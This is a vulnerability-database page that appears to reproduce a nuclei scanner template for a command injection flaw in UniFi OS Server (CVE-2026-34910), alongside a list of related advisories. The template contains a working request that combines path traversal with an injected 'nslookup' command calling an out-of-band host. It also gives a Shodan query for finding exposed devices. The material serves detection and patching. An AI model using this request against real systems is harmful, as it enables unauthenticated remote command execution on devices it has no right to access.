Lucene search
K

UniFi OS Server - Command Injection

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

Command injection in UniFi OS Server from input validation flaw; update to latest version.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-34908
5 Jun 202620:28
githubexploit
ATTACKERKB
CVE-2026-34910
22 May 202600:43
attackerkb
BDU FSTEC
The vulnerability of the UniFi OS Server network management center, related to insufficient validation of input data, allows a perpetrator to execute arbitrary commands.
4 Jun 202600:00
bdu_fstec
Circl
CVE-2026-34910
22 May 202614:49
circl
CISA KEV Catalog
Ubiquiti UniFi OS Improper Input Validation Vulnerability
23 Jun 202600:00
cisa_kev
CNNVD
Ubiquiti UniFi OS Server 安全漏洞
22 May 202600:00
cnnvd
CVE
CVE-2026-34910
22 May 202600:43
cve
Cvelist
CVE-2026-34910
22 May 202600:43
cvelist
EUVD
EUVD-2026-31382
22 May 202600:43
euvd
NVD
CVE-2026-34910
22 May 202602:16
nvd
Rows per page
id: CVE-2026-34910

info:
  name: UniFi OS Server - Command Injection
  author: Kazgangap
  severity: critical
  description: |
    A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
  impact: |
    Network attackers can execute arbitrary commands, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of UniFi OS.
  reference:
    - https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34910
    - https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b
    - https://www.it-connect.tech/critical-3-exploit-chain-grants-root-access-on-unifi-os-server/
  classification:
    cve-id: CVE-2026-34910
    epss-score: 0.78555
    epss-percentile: 0.99536
    cvss-score: 10.0
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"UniFi OS"
  tags: cve,cve2026,unifi,rce,vkev,kev

http:
  - raw:
      - |
        GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+{{interactsh-url}}+%3b HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body , "CODE_SYSTEM_ERROR", "System failure")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100972ef957c1c049015f29a341416a78b109646103e7d02a57ea8f610e04e63a55022078a350efddf0d16a1cd7d436c913109afbd90145c821f3373f32915c6e81c49e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jun 2026 08:53Current
7.2High risk
Vulners AI Score7.2
CVSS 3.110
EPSS0.78555
SSVC
37